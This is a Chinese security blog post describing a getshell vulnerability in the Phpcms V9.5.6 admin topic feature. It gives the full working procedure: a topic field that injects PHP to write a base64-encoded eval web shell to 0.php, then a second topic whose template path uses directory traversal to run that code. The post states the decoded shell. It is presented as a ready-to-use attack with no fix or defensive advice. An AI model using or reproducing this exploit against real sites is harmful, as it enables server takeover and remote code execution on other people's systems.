首页 » 网站攻防 » 浏览内容

Phpcms最新版V9.5.6后台专题getshell漏洞

267 0 发表评论

简要描述:

低权限后台拿shell
版本:Phpcms V9.5.6 Release 20140522

详细说明:

前提是需要有管理专题的权限

测试版本

PHPCMS程序版本:Phpcms V9.5.6 Release 20140522

过程

添加专题专题名称:test

  1. 专题横幅:/1.jpg
  2. 专题缩略图:/1.jpg
  3. 专题导读:
  4. 生成静态:是
  5. <?php file_put_contents(‘0.php’,base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==’)); ?>
  6. 专题生成目录:test000
  7. 专题子分类:test test
  8. 其他默认 -> 提交

2. 再次添加专题

  1. 专题名称:test1
  2. 专题横幅:/1.jpg
  3. 专题缩略图:/1.jpg
  4. 专题导读:
  5. 生成静态:是
  6. 专题生成目录:test111
  7. 专题子分类:test test
  8. 扩展设置
  9. 专题模板:value设置为../../../../html/special/test000/index

其他默认 -> 提交

会在根目录下面生成 0.php 内容为 <?php @eval($_POST[5]);?>

漏洞证明:

标签:

评论 共 0 条 (RSS 2.0) 发表 评论

  1. 暂无评论,快来抢沙发!

发表评论

  •   没有头像?

关注我们,实时联系

通知公告">更多...

♥如果喜欢本站可以直接点击订阅博客
♥点击此加入晓残博客会员群加入扣群
♥本站免费提供加密解密服务点击解密
♥如果你有意向广告合作点击广

站长微信

订阅博客

站内广告

博客统计

  • 日志总数:545 篇
  • 评论数目:2168 条
  • 标签总数:43 个
  • 页面总数:8 个
  • 分类总数:17 个
  • 友链总数:24 个
  • 建站日期:2011-02-13
  • 运行天数:2715 天
  • 最后更新:2018-6-28